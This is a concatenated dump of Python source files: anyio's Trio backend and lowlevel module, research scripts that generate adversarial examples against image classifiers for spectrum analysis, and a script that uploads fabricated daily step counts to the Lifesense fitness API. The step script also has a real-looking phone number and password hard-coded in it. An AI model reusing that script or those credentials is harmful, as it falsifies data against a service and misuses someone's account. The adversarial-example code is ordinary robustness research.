def __init__(self, trio_socket):
super().__init__(trio_socket)
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
async def receive(self) -> bytes:
with self._receive_guard:
try:
return await self._trio_socket.recv(65536)
except BaseException as exc:
self._convert_socket_error(exc)
async def send(self, item: bytes) -> None:
with self._send_guard:
try:
await self._trio_socket.send(item)
except BaseException as exc:
self._convert_socket_error(exc)
async def connect_tcp(host: str, port: int,
local_address: Optional[IPSockAddrType] = None) -> SocketStream:
family = socket.AF_INET6 if ':' in host else socket.AF_INET
trio_socket = trio.socket.socket(family)
trio_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if local_address:
await trio_socket.bind(local_address)
try:
await trio_socket.connect((host, port))
except BaseException:
trio_socket.close()
raise
return SocketStream(trio_socket)
async def connect_unix(path: str) -> UNIXSocketStream:
trio_socket = trio.socket.socket(socket.AF_UNIX)
try:
await trio_socket.connect(path)
except BaseException:
trio_socket.close()
raise
return UNIXSocketStream(trio_socket)
async def create_udp_socket(
family: socket.AddressFamily,
local_address: Optional[IPSockAddrType],
remote_address: Optional[IPSockAddrType],
reuse_port: bool
) -> Union[UDPSocket, ConnectedUDPSocket]:
trio_socket = trio.socket.socket(family=family, type=socket.SOCK_DGRAM)
if reuse_port:
trio_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
if local_address:
await trio_socket.bind(local_address)
if remote_address:
await trio_socket.connect(remote_address)
return ConnectedUDPSocket(trio_socket)
else:
return UDPSocket(trio_socket)
getaddrinfo = trio.socket.getaddrinfo
getnameinfo = trio.socket.getnameinfo
async def wait_socket_readable(sock):
try:
await wait_readable(sock)
except trio.ClosedResourceError as exc:
raise ClosedResourceError().with_traceback(exc.__traceback__) from None
except trio.BusyResourceError:
raise BusyResourceError('reading from') from None
async def wait_socket_writable(sock):
try:
await wait_writable(sock)
except trio.ClosedResourceError as exc:
raise ClosedResourceError().with_traceback(exc.__traceback__) from None
except trio.BusyResourceError:
raise BusyResourceError('writing to') from None
#
# Synchronization
#
class Event(BaseEvent):
def __new__(cls):
return object.__new__(cls)
def __init__(self):
self.__original = trio.Event()
def is_set(self) -> bool:
return self.__original.is_set()
async def wait(self) -> bool:
return await self.__original.wait()
def statistics(self) -> EventStatistics:
return self.__original.statistics()
def set(self):
self.__original.set()
return DeprecatedAwaitable(self.set)
class CapacityLimiter(BaseCapacityLimiter):
def __new__(cls, *args, **kwargs):
return object.__new__(cls)
def __init__(self, *args, original: Optional[trio.CapacityLimiter] = None):
self.__original = original or trio.CapacityLimiter(*args)
async def __aenter__(self):
return await self.__original.__aenter__()
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
return await self.__original.__aexit__(exc_type, exc_val, exc_tb)
@property
def total_tokens(self) -> float:
return self.__original.total_tokens
@total_tokens.setter
def total_tokens(self, value: float) -> None:
self.__original.total_tokens = value
@property
def borrowed_tokens(self) -> int:
return self.__original.borrowed_tokens
@property
def available_tokens(self) -> float:
return self.__original.available_tokens
def acquire_nowait(self):
self.__original.acquire_nowait()
return DeprecatedAwaitable(self.acquire_nowait)
def acquire_on_behalf_of_nowait(self, borrower):
self.__original.acquire_on_behalf_of_nowait(borrower)
return DeprecatedAwaitable(self.acquire_on_behalf_of_nowait)
async def acquire(self) -> None:
await self.__original.acquire()
async def acquire_on_behalf_of(self, borrower) -> None:
await self.__original.acquire_on_behalf_of(borrower)
def release(self) -> None:
return self.__original.release()
def release_on_behalf_of(self, borrower) -> None:
return self.__original.release_on_behalf_of(borrower)
def statistics(self) -> CapacityLimiterStatistics:
return self.__original.statistics()
_capacity_limiter_wrapper = RunVar('_capacity_limiter_wrapper')
def current_default_thread_limiter() -> CapacityLimiter:
try:
return _capacity_limiter_wrapper.get()
except LookupError:
limiter = CapacityLimiter(original=trio.to_thread.current_default_thread_limiter())
_capacity_limiter_wrapper.set(limiter)
return limiter
#
# Signal handling
#
class _SignalReceiver(DeprecatedAsyncContextManager):
def __init__(self, cm):
self._cm = cm
def __enter__(self) -> T:
return self._cm.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
return self._cm.__exit__(exc_type, exc_val, exc_tb)
def open_signal_receiver(*signals: int):
cm = trio.open_signal_receiver(*signals)
return _SignalReceiver(cm)
#
# Testing and debugging
#
def get_current_task() -> TaskInfo:
task = trio_lowlevel.current_task()
parent_id = None
if task.parent_nursery and task.parent_nursery.parent_task:
parent_id = id(task.parent_nursery.parent_task)
return TaskInfo(id(task), parent_id, task.name, task.coro)
def get_running_tasks() -> List[TaskInfo]:
root_task = trio_lowlevel.current_root_task()
task_infos = [TaskInfo(id(root_task), None, root_task.name, root_task.coro)]
nurseries = root_task.child_nurseries
while nurseries:
new_nurseries: List[trio.Nursery] = []
for nursery in nurseries:
for task in nursery.child_tasks:
task_infos.append(
TaskInfo(id(task), id(nursery.parent_task), task.name, task.coro))
new_nurseries.extend(task.child_nurseries)
nurseries = new_nurseries
return task_infos
def wait_all_tasks_blocked():
import trio.testing
return trio.testing.wait_all_tasks_blocked()
class TestRunner(abc.TestRunner):
def __init__(self, **options):
from collections import deque
from queue import Queue
self._call_queue = Queue()
self._result_queue = deque()
self._stop_event: Optional[trio.Event] = None
self._nursery: Optional[trio.Nursery] = None
self._options = options
async def _trio_main(self) -> None:
self._stop_event = trio.Event()
async with trio.open_nursery() as self._nursery:
await self._stop_event.wait()
async def _call_func(self, func, args, kwargs):
try:
retval = await func(*args, **kwargs)
except BaseException as exc:
self._result_queue.append(Error(exc))
else:
self._result_queue.append(Value(retval))
def _main_task_finished(self, outcome) -> None:
self._nursery = None
def close(self) -> None:
if self._stop_event:
self._stop_event.set()
while self._nursery is not None:
self._call_queue.get()()
def call(self, func: Callable[..., Awaitable], *args, **kwargs):
if self._nursery is None:
trio.lowlevel.start_guest_run(
self._trio_main, run_sync_soon_threadsafe=self._call_queue.put,
done_callback=self._main_task_finished, **self._options)
while self._nursery is None:
self._call_queue.get()()
self._nursery.start_soon(self._call_func, func, args, kwargs)
while not self._result_queue:
self._call_queue.get()()
outcome = self._result_queue.pop()
return outcome.unwrap()
```
#### File: src/anyio/lowlevel.py
```python
from typing import Any, Dict, Generic, Set, TypeVar, Union, cast
from weakref import WeakKeyDictionary
from ._core._eventloop import get_asynclib
T = TypeVar('T')
D = TypeVar('D')
async def checkpoint() -> None:
"""
Check for cancellation and allow the scheduler to switch to another task.
Equivalent to (but more efficient than)::
await checkpoint_if_cancelled()
await cancel_shielded_checkpoint()
.. versionadded:: 3.0
"""
await get_asynclib().checkpoint()
async def checkpoint_if_cancelled():
"""
Enter a checkpoint if the enclosing cancel scope has been cancelled.
This does not allow the scheduler to switch to a different task.
.. versionadded:: 3.0
"""
await get_asynclib().checkpoint_if_cancelled()
async def cancel_shielded_checkpoint() -> None:
"""
Allow the scheduler to switch to another task but without checking for cancellation.
Equivalent to (but potentially more efficient than)::
with CancelScope(shield=True):
await checkpoint()
.. versionadded:: 3.0
"""
await get_asynclib().cancel_shielded_checkpoint()
def current_token() -> object:
"""Return a backend specific token object that can be used to get back to the event loop."""
return get_asynclib().current_token()
_run_vars = WeakKeyDictionary() # type: WeakKeyDictionary[Any, Dict[str, Any]]
_token_wrappers: Dict[Any, '_TokenWrapper'] = {}
class _TokenWrapper:
__slots__ = '_token', '__weakref__'
def __init__(self, token):
self._token = token
def __eq__(self, other):
return self._token is other._token
def __hash__(self):
return hash(self._token)
class RunvarToken:
__slots__ = '_var', '_value', '_redeemed'
def __init__(self, var: 'RunVar', value):
self._var = var
self._value = value
self._redeemed = False
class RunVar(Generic[T]):
"""Like a :class:`~contextvars.ContextVar`, expect scoped to the running event loop."""
__slots__ = '_name', '_default'
NO_VALUE_SET = object()
_token_wrappers: Set[_TokenWrapper] = set()
def __init__(self, name: str, default: Union[T, object] = NO_VALUE_SET):
self._name = name
self._default = default
@property
def _current_vars(self) -> Dict[str, T]:
token = current_token()
while True:
try:
return _run_vars[token]
except TypeError:
# Happens when token isn't weak referable (TrioToken).
# This workaround does mean that some memory will leak on Trio until the problem
# is fixed on their end.
token = _TokenWrapper(token)
self._token_wrappers.add(token)
except KeyError:
run_vars = _run_vars[token] = {}
return run_vars
def get(self, default: Union[T, object] = NO_VALUE_SET) -> T:
try:
return self._current_vars[self._name]
except KeyError:
if default is not RunVar.NO_VALUE_SET:
return cast(T, default)
elif self._default is not RunVar.NO_VALUE_SET:
return cast(T, self._default)
raise LookupError(f'Run variable "{self._name}" has no value and no default set')
def set(self, value: T) -> RunvarToken:
current_vars = self._current_vars
token = RunvarToken(self, current_vars.get(self._name, RunVar.NO_VALUE_SET))
current_vars[self._name] = value
return token
def reset(self, token: RunvarToken) -> None:
if token._var is not self:
raise ValueError('This token does not belong to this RunVar')
if token._redeemed:
raise ValueError('This token has already been used')
if token._value is RunVar.NO_VALUE_SET:
try:
del self._current_vars[self._name]
except KeyError:
pass
else:
self._current_vars[self._name] = token._value
token._redeemed = True
def __repr__(self):
return f'<RunVar name={self._name!r}>'
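# Hedged usage sketch (must run inside an anyio event loop; names are illustrative):
#
#     _limit = RunVar('limit', default=10)
#     token = _limit.set(20)     # value is scoped to the running event loop
#     _limit.get()               # -> 20
#     _limit.reset(token)        # restores the previous state (here: the default)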
``` |
{
"source": "JohnZero-Python/lexinSport",
"score": 2
} |
#### File: JohnZero-Python/lexinSport/change_step.py
```python
import requests
import json
import hashlib
import time
import datetime
class LexinSport:
def __init__(self, username, password, step):
self.username = username
self.password = password
self.step = step
# ็ปๅฝ
def login(self):
url = 'https://sports.lifesense.com/sessions_service/login?systemType=2&version=4.6.7'
data = {'loginName': self.username, 'password': hashlib.md5(self.password.encode('utf8')).hexdigest(),
'clientId': '49a41c9727ee49dda3b190dc907850cc', 'roleType': 0, 'appType': 6}
headers = {
'Content-Type': 'application/json; charset=utf-8',
'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 7.1.2; LIO-AN00 Build/LIO-AN00)'
}
response_result = requests.post(url, data=json.dumps(data), headers=headers)
status_code = response_result.status_code
response_text = response_result.text
# print('็ปๅฝ็ถๆ็ ๏ผ%s' % status_code)
# print('็ปๅฝ่ฟๅๆฐๆฎ๏ผ%s' % response_text)
if status_code == 200:
response_text = json.loads(response_text)
user_id = response_text['data']['userId']
access_token = response_text['data']['accessToken']
return user_id, access_token
else:
return '็ปๅฝๅคฑ่ดฅ'
# ไฟฎๆนๆญฅๆฐ
def change_step(self):
# ็ปๅฝ็ปๆ
login_result = self.login()
if login_result == '็ปๅฝๅคฑ่ดฅ':
return '็ปๅฝๅคฑ่ดฅ'
else:
url = 'https://sports.lifesense.com/sport_service/sport/sport/uploadMobileStepV2?systemType=2&version=4.6.7'
data = {'list': [{'DataSource': 2, 'active': 1, 'calories': int(self.step/4), 'dataSource': 2,
'deviceId': 'M_NULL', 'distance': int(self.step/3), 'exerciseTime': 0, 'isUpload': 0,
'measurementTime': time.strftime('%Y-%m-%d %H:%M:%S'), 'priority': 0, 'step': self.step,
'type': 2, 'updated': int(round(time.time() * 1000)), 'userId': login_result[0]}]}
headers = {
'Content-Type': 'application/json; charset=utf-8',
'Cookie': 'accessToken=%s' % login_result[1]
}
response_result = requests.post(url, data=json.dumps(data), headers=headers)
status_code = response_result.status_code
# response_text = response_result.text
# print('ไฟฎๆนๆญฅๆฐ็ถๆ็ ๏ผ%s' % status_code)
# print('ไฟฎๆนๆญฅๆฐ่ฟๅๆฐๆฎ๏ผ%s' % response_text)
if status_code == 200:
return 'ไฟฎๆนๆญฅๆฐไธบใ%sใๆๅ' % self.step
else:
return 'ไฟฎๆนๆญฅๆฐๅคฑ่ดฅ'
# ็ก็ ๅฐ็ฌฌไบๅคฉๆง่กไฟฎๆนๆญฅๆฐ็ๆถ้ด
def get_sleep_time():
# ็ฌฌไบๅคฉๆฅๆ
tomorrow = datetime.date.today() + datetime.timedelta(days=1)
# ็ฌฌไบๅคฉ7็นๆถ้ดๆณ
tomorrow_run_time = int(time.mktime(time.strptime(str(tomorrow), '%Y-%m-%d'))) + 25200
# print(tomorrow_run_time)
# ๅฝๅๆถ้ดๆณ
current_time = int(time.time())
# print(current_time)
return tomorrow_run_time - current_time
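# Worked example (hedged, illustrative clock times): if the script runs at
# 23:00, tomorrow_run_time points at 07:00 the next morning (midnight + 25200 s),
# so get_sleep_time() returns roughly 8 * 3600 = 28800 seconds.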
if __name__ == "__main__":
# ๆๅคง่ฟ่กๅบ้ๆฌกๆฐ
fail_num = 3
while 1:
while fail_num > 0:
try:
# ไฟฎๆนๆญฅๆฐ็ปๆ
result = LexinSport('15387831766', 'v=RnZ94I', 20000).change_step()
print(result)
break
except Exception as e:
print('่ฟ่กๅบ้๏ผๅๅ ๏ผ%s' % e)
fail_num -= 1
if fail_num == 0:
print('ไฟฎๆนๆญฅๆฐๅคฑ่ดฅ')
# ้็ฝฎ่ฟ่กๅบ้ๆฌกๆฐ
fail_num = 3
# ่ทๅ็ก็ ๆถ้ด
sleep_time = get_sleep_time()
time.sleep(sleep_time)
# ๆญฅๆฐๅช่ฝๆนๅคงไธ่ฝๆนๅฐ๏ผSN็ ๏ผ0498178301181183
# https://jingyan.baidu.com/article/22fe7ced657b427102617fe3.html
``` |
{
"source": "JohnZhang000/adaptive-jpeg-compression",
"score": 2
} |
#### File: adaptive-jpeg-compression/code_history/Attack_compare_spectrum.py
```python
import cv2
import torch
import torch.nn as nn
import numpy as np
import os
from models.cifar.allconv import AllConvNet
from models.resnet import resnet50
from models.vgg import vgg16_bn
from models.cifar.allconv import AllConvNet
import torchvision.models as models
from third_party.ResNeXt_DenseNet.models.densenet import densenet
from third_party.ResNeXt_DenseNet.models.resnext import resnext29
from third_party.WideResNet_pytorch.wideresnet import WideResNet
from art.attacks.evasion import FastGradientMethod,DeepFool
from art.attacks.evasion import CarliniL2Method,CarliniLInfMethod
from art.attacks.evasion import ProjectedGradientDescent
from art.attacks.evasion import UniversalPerturbation
from art.estimators.classification import PyTorchClassifier
import json
import sys
from tqdm import tqdm
from PIL import Image
sys.path.append("..")
# from train_code.my_img_transformer import img_transformer
# from PathwayGrad.my_pathway_analyzer import my_critical_path
from my_spectrum_analyzer import img_spectrum_analyzer
# from Attack_compare_spectrum_plot import spectrum_analysis
sys.path.append('../common_code')
from load_cifar_data import load_CIFAR_batch
def save_images(saved_dir,vanilla_images,attacked_images,labels,idx,features,attacked_name='attacked'):
vanilla_dir=os.path.join(saved_dir,'vanilla')
diff_dir=os.path.join(saved_dir,'diff')
attacked_dir=os.path.join(saved_dir,attacked_name)
if not os.path.exists(vanilla_dir):
os.makedirs(vanilla_dir)
if not os.path.exists(diff_dir):
os.makedirs(diff_dir)
if not os.path.exists(attacked_dir):
os.makedirs(attacked_dir)
choosed_idx = 0
    aug_coeff = 10  # error amplification factor
img_vanilla_tc = vanilla_images[choosed_idx,...].squeeze(0).permute(1,2,0).cpu().numpy()
img_vanilla_np = np.uint8(np.clip(np.round(img_vanilla_tc*255),0,255))
img_attacked_tc = attacked_images[0][choosed_idx,...].squeeze(0).permute(1,2,0).cpu().numpy()
img_attacked_np = np.uint8(np.clip(np.round(img_attacked_tc*255),0,255))
img_diff_tc = (img_attacked_tc - img_vanilla_tc)*aug_coeff
img_diff_np = np.uint8(np.clip(np.round((img_diff_tc-img_diff_tc.mean()+0.5)*255),0,255))
label_choosed=list(features.items())[int(labels[choosed_idx].cpu().numpy())][0]
name=label_choosed+'_'+str(idx+choosed_idx)+'.png'
img_vanilla_np_res=cv2.resize(img_vanilla_np, (224,224))
img_attacked_np_res=cv2.resize(img_attacked_np, (224,224))
img_diff_np_res=cv2.resize(img_diff_np, (224,224))
cv2.imwrite(os.path.join(vanilla_dir,name), img_vanilla_np_res)
cv2.imwrite(os.path.join(diff_dir,name), img_diff_np_res)
cv2.imwrite(os.path.join(attacked_dir,name), img_attacked_np_res)
def pathlist2np(pathlist):
batch_num=len(pathlist)
images_num=pathlist[0].shape[0]
method_num=pathlist[0].shape[1]
path_num=pathlist[0].shape[2]
paths=np.zeros((batch_num*images_num,method_num,path_num))
for i in range(batch_num):
paths[i*images_num:(i+1)*images_num,...]=pathlist[i]
return paths
def load_imagenet_filenames(dataset_dir,features):
filename=dataset_dir+'.txt'
with open(filename, 'r') as f:
data_list=f.readlines()
label_list=[]
image_list=[]
for data in data_list:
sysnet,name=data.split('/')
label_list.append(features[sysnet])
image_list.append(data.replace('\n',''))
return image_list,label_list
def load_imagenet_batch(batch_idx,batch_size,data_dir,data_list,label_list):
filenames=data_list[batch_idx*batch_size:(batch_idx+1)*batch_size]
labels=np.array(label_list[batch_idx*batch_size:(batch_idx+1)*batch_size])
images=np.zeros([batch_size,224,224,3])
for file_idx,file in enumerate(filenames):
image = Image.open(os.path.join(data_dir,file)).convert('RGB').resize([224,224])
images[file_idx,...] = np.asarray(image)/255.0
images=images.transpose(0,3,1,2).astype(np.float32)
# images=images
return images,labels
'''
settings
'''
# ้
็ฝฎ่งฃ้ๅจๅๆฐ
if len(sys.argv)!=5:
print('Manual Mode !!!')
model_type ='resnet50_imagenet'
att_method ='FGSM_L2_IDP'
eps ='1.0'
device = 0
# print('aaa')
else:
print('Terminal Mode !!!')
model_type = sys.argv[1]
att_method = sys.argv[2]
eps = sys.argv[3]
device = int(sys.argv[4])
# print('bbb')
batch = 1000
flag_imagenet = 0
# img_per_batch = 2
# setup_seed(0)
dir_model = '../models/cifar_vanilla_'+model_type+'.pth.tar'
'''
ๅ ่ฝฝๆจกๅ
'''
dataset ='cifar-10'
if model_type == 'resnet50_imagenet':
model = models.resnet50(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset ='imagenet'
elif model_type == 'vgg16_imagenet':
model = models.vgg16(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset ='imagenet'
elif model_type == 'alexnet_imagenet':
model = models.alexnet(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset ='imagenet'
elif model_type == 'resnet50':
model = resnet50().eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
elif model_type == 'vgg16':
model = vgg16_bn().eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
elif model_type == 'allconv':
model = AllConvNet(10).eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
else:
raise Exception('Wrong model name: {} !!!'.format(model_type))
if 'cifar-10'==dataset:
mean = np.array((0.5,0.5,0.5),dtype=np.float32)
std = np.array((0.5,0.5,0.5),dtype=np.float32)
nb_classes = 10
input_shape=(3,32,32)
with open(os.path.join("../models/cifar-10_class_to_idx.json")) as f:
features=json.load(f)
data_dir = '../../../../../media/ubuntu204/F/Dataset/Dataset_tar/cifar-10-batches-py'
images,labels = load_CIFAR_batch(os.path.join(data_dir,'test_batch'))
elif 'imagenet'==dataset:
mean = np.array((0.485, 0.456, 0.406),dtype=np.float32)
std = np.array((0.229, 0.224, 0.225),dtype=np.float32)
nb_classes = 1000
input_shape=(3,224,224)
with open(os.path.join("../models/imagenet_class_to_idx.json")) as f:
features=json.load(f)
data_dir='../../../../../media/ubuntu204/F/Dataset/ILSVRC2012/val'
images,labels=load_imagenet_filenames(data_dir,features)
else:
raise Exception('Wrong dataset type: {} !!!'.format(dataset))
fmodel = PyTorchClassifier(model = model,nb_classes=nb_classes,clip_values=(0,1),
input_shape=input_shape,loss = nn.CrossEntropyLoss(),
preprocessing=(mean, std))
eps=float(eps)
max_img_uni = 50
'''
ๅ ่ฝฝcifar-10ๅพๅ
'''
# os.environ['CUDA_VISIBLE_DEVICES']=str(device)
'''
ๆปๅปๅๅงๅ
'''
if att_method == 'FGSM_L2_IDP':
attack = FastGradientMethod(estimator=fmodel,eps=eps,norm=2)
elif att_method == 'PGD_L2_IDP':
attack = ProjectedGradientDescent(estimator=fmodel,eps=eps,norm=2,batch_size=128,verbose=False)
elif att_method == 'CW_L2_IDP':
attack = CarliniL2Method(classifier=fmodel,batch_size=128,verbose=False)
elif att_method == 'Deepfool_L2_IDP':
attack = DeepFool(classifier=fmodel,batch_size=128,verbose=False)
elif att_method == 'FGSM_Linf_IDP':
attack = FastGradientMethod(estimator=fmodel,eps=eps,norm=np.inf)
elif att_method == 'PGD_Linf_IDP':
attack = ProjectedGradientDescent(estimator=fmodel,eps=eps,norm=np.inf,batch_size=128,verbose=False)
elif att_method == 'CW_Linf_IDP':
attack = CarliniLInfMethod(classifier=fmodel,eps=eps,batch_size=128,verbose=False)
elif att_method == 'FGSM_L2_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='fgsm',attacker_params={'eps':eps,'norm':2,'verbose':False},eps=eps,norm=2,batch_size=128,verbose=False)
batch = max_img_uni
elif att_method == 'PGD_L2_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='pgd',attacker_params={'eps':eps,'norm':2,'verbose':False},eps=eps,norm=2,batch_size=128,verbose=False)
batch = max_img_uni
elif att_method == 'CW_L2_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='carlini',attacker_params={'eps':eps,'norm':2,'verbose':False},eps=eps,norm=2,batch_size=128,verbose=True)
batch = max_img_uni
elif att_method == 'Deepfool_L2_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='deepfool',attacker_params={'eps':eps,'norm':2,'verbose':False},eps=eps,norm=2,batch_size=128,verbose=False)
batch = max_img_uni
elif att_method == 'FGSM_Linf_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='fgsm',attacker_params={'eps':eps,'norm':np.inf,'verbose':False},eps=eps,norm=np.inf,batch_size=128,verbose=False)
batch = max_img_uni
elif att_method == 'PGD_Linf_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='pgd',attacker_params={'eps':eps,'norm':np.inf,'verbose':False},eps=eps,norm=np.inf,batch_size=128,verbose=False)
batch = max_img_uni
elif att_method == 'CW_Linf_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='carlini_inf',attacker_params={'eps':eps,'norm':np.inf,'verbose':False},eps=eps,norm=np.inf,batch_size=128,verbose=False)
batch = max_img_uni
else:
raise Exception('Wrong Attack Mode: {} !!!'.format(att_method))
'''
่ฏปๅๆฐๆฎ
'''
# fft_transformer = img_transformer(8,0,6)
saved_dir = '../saved_tests/img_attack/'+model_type+'_'+att_method+'_'+str(eps)
success_num = 0
clean_accs = 0
masked_cln_accs = 0
masked_adv_accs = 0
jpg_cln_accs = 0
jpg_adv_accs = 0
pca_cln_accs = 0
pca_adv_accs = 0
pcab_cln_accs = 0
pcab_adv_accs = 0
model_sparsity_threshold = None
batch_num = int(len(labels)/batch)
# pather = my_critical_path(model, 80, 'cifar-10')
s_analyzer = img_spectrum_analyzer(input_shape[1])
map_diff_cln = []
map_diff_adv = []
map_diff_msk = []
clean_path_list = []
adv_path_list = []
msk_clean_path_list = []
msk_adv_path_list = []
Es_cln_list = []
Es_adv_list = []
Es_mcln_list = []
Es_madv_list = []
Es_diff_list = []
Es_diff_list_mcln = []
Es_diff_list_madv = []
print(batch)
for i in tqdm(range(batch_num)):
if i>0:
continue
'''
ๆปๅปไธ้ฒๆค
'''
if 'cifar-10'==dataset:
images_batch = images[batch*i:batch*(i+1),...].transpose(0,3,1,2)
labels_batch = labels[batch*i:batch*(i+1),...]
elif 'imagenet'==dataset:
images_batch,labels_batch=load_imagenet_batch(i,batch,data_dir,images,labels)
# ๅๅงๅ็กฎ็
predictions = fmodel.predict(images_batch)
clean_accs += np.sum(np.argmax(predictions,axis=1)==labels_batch)
# ๆปๅป
img_adv = attack.generate(x=images_batch,y=labels_batch)
predictions = fmodel.predict(img_adv)
success_num += np.sum(np.argmax(predictions,axis=1)!=labels_batch)
# # ไฝ้ขๆปคๆณข clean
# masked_clns = fft_transformer.img_transform_tc(images_batch)
# predictions = fmodel.predict(masked_clns)
# masked_cln_accs += np.sum(np.argmax(predictions,axis=1)==labels_batch)
# # ไฝ้ขๆปคๆณข adv
# masked_advs = fft_transformer.img_transform_tc(img_adv)
# predictions = fmodel.predict(masked_advs)
# masked_adv_accs += np.sum(np.argmax(predictions,axis=1)==labels_batch)
'''
้ข่ฐฑๅๆ
'''
E,_ = s_analyzer.batch_get_spectrum_energy(images_batch)
Es_cln_list.append(E)
E,_ = s_analyzer.batch_get_spectrum_energy(img_adv)
Es_adv_list.append(E)
# E,_ = s_analyzer.batch_get_spectrum_energy(masked_clns)
# Es_mcln_list.append(E)
# E,_ = s_analyzer.batch_get_spectrum_energy(masked_advs)
# Es_madv_list.append(E)
E,_ = s_analyzer.batch_get_spectrum_energy((img_adv-images_batch))
Es_diff_list.append(E)
# E,_ = s_analyzer.batch_get_spectrum_energy((masked_clns-images_batch))
# Es_diff_list_mcln.append(E)
# E,_ = s_analyzer.batch_get_spectrum_energy((masked_advs-images_batch))
# Es_diff_list_madv.append(E)
torch.cuda.empty_cache()
sub_dir='spectrum'
saved_dir_path = '../saved_tests/img_attack/'+model_type+'_'+att_method+'_'+str(eps)+'/'+sub_dir
if not os.path.exists(saved_dir_path):
os.makedirs(saved_dir_path)
Es_cln_np=np.vstack(Es_cln_list)
Es_adv_np=np.vstack(Es_adv_list)
# Es_mcln_np=np.vstack(Es_mcln_list)
# Es_madv_np=np.vstack(Es_madv_list)
Es_diff_np=np.vstack(Es_diff_list)
# Es_diff_np_mcln=np.vstack(Es_diff_list_mcln)
# Es_diff_np_madv=np.vstack(Es_diff_list_madv)
np.save(os.path.join(saved_dir_path,'clean_spectrum.npy'), Es_cln_np)
np.save(os.path.join(saved_dir_path,'adv_spectrum.npy'), Es_adv_np)
# np.save(os.path.join(saved_dir_path,'mclean_spectrum.npy'), Es_mcln_np)
# np.save(os.path.join(saved_dir_path,'madv_spectrum.npy'), Es_madv_np)
np.save(os.path.join(saved_dir_path,'diff_spectrum.npy'), Es_diff_np)
# np.save(os.path.join(saved_dir_path,'mcln_diff_spectrum.npy'), Es_diff_np_mcln)
# np.save(os.path.join(saved_dir_path,'madv_diff_spectrum.npy'), Es_diff_np_madv)
```
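A minimal follow-up sketch, not part of the original script: it loads the spectrum arrays saved above and compares their band-wise means. The directory name is a placeholder built the same way as `saved_dir_path` in the loop.
```python
# Sketch: inspect the saved spectrum-energy arrays (directory name is a placeholder).
import os
import numpy as np

saved_dir_path = '../saved_tests/img_attack/allconv_FGSM_L2_IDP_0.1/spectrum'  # hypothetical run
clean = np.load(os.path.join(saved_dir_path, 'clean_spectrum.npy'))
adv = np.load(os.path.join(saved_dir_path, 'adv_spectrum.npy'))
diff = np.load(os.path.join(saved_dir_path, 'diff_spectrum.npy'))

# Each row is one image's radial energy profile; compare the per-band averages.
print('mean clean energy per band:', clean.mean(axis=0))
print('mean adv energy per band:  ', adv.mean(axis=0))
print('mean perturbation energy:  ', diff.mean(axis=0))
```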
#### File: adaptive-jpeg-compression/code_history/my_spectrum_labeler.py
```python
import numpy as np
# import matplotlib.pyplot as plt
# from mpl_toolkits.mplot3d import Axes3D
from my_spectrum_analyzer import img_spectrum_analyzer
import torch
from torchvision import transforms #datasets, models,
from tqdm import tqdm
import os
import sys
import torch.nn as nn
import time
from models.cifar.allconv import AllConvNet
from models.resnet import resnet50
from models.vgg import vgg16_bn
from models.cifar.allconv import AllConvNet
import torchvision.models as models
from third_party.ResNeXt_DenseNet.models.densenet import densenet
from third_party.ResNeXt_DenseNet.models.resnext import resnext29
from third_party.WideResNet_pytorch.wideresnet import WideResNet
from art.attacks.evasion import FastGradientMethod,DeepFool
from art.attacks.evasion import CarliniL2Method,CarliniLInfMethod
from art.attacks.evasion import ProjectedGradientDescent
# from art.attacks.evasion import UniversalPerturbation
from art.estimators.classification import PyTorchClassifier
import json
sys.path.append("..")
# from train_code.my_img_transformer import img_transformer
# from mpl_toolkits.mplot3d import Axes3D
# from sklearn.manifold import TSNE
sys.path.append('../common_code')
from load_cifar_data import load_CIFAR_batch,load_CIFAR_train
class img_spectrum_labeler:
# labeler initialization
def __init__(self,dataset):
if 'imagenet'==dataset:
self.img_size=224
mean_now=[0.485, 0.456, 0.406]
std_now=[0.229, 0.224, 0.225]
self.num_classes=1000
elif 'cifar-10'==dataset:
self.img_size=32
mean_now=[0.5] * 3
std_now=[0.5] * 3
self.num_classes=10
else:
print('ERROR DATASET')
self.trans=transforms.Compose([transforms.Normalize(mean=mean_now, std=std_now)])
self.s_analyzer=img_spectrum_analyzer(self.img_size).batch_get_spectrum_feature#batch_get_spectrum_energy
def select_attack(self, fmodel, attack_idx, eps_idx):
attack_names=['FGSM_L2_IDP','PGD_L2_IDP','CW_L2_IDP','Deepfool_L2_IDP','FGSM_Linf_IDP','PGD_Linf_IDP','CW_Linf_IDP']
eps_L2=[0.1,1.0,10.0,100.0]
eps_Linf=[0.01,0.1,1.0,10.0]
att_method=attack_names[attack_idx]
if 'L2' in att_method:
eps=float(eps_L2[eps_idx%len(eps_L2)])
else:
eps=float(eps_Linf[eps_idx%len(eps_Linf)])
if att_method == 'FGSM_L2_IDP':
attack = FastGradientMethod(estimator=fmodel,eps=eps,norm=2)
elif att_method == 'PGD_L2_IDP':
attack = ProjectedGradientDescent(estimator=fmodel,eps=eps,norm=2,batch_size=512,verbose=False)
elif att_method == 'CW_L2_IDP':
attack = CarliniL2Method(classifier=fmodel,batch_size=512,verbose=False)
elif att_method == 'Deepfool_L2_IDP':
attack = DeepFool(classifier=fmodel,batch_size=512,verbose=False)
elif att_method == 'FGSM_Linf_IDP':
attack = FastGradientMethod(estimator=fmodel,eps=eps,norm=np.inf)
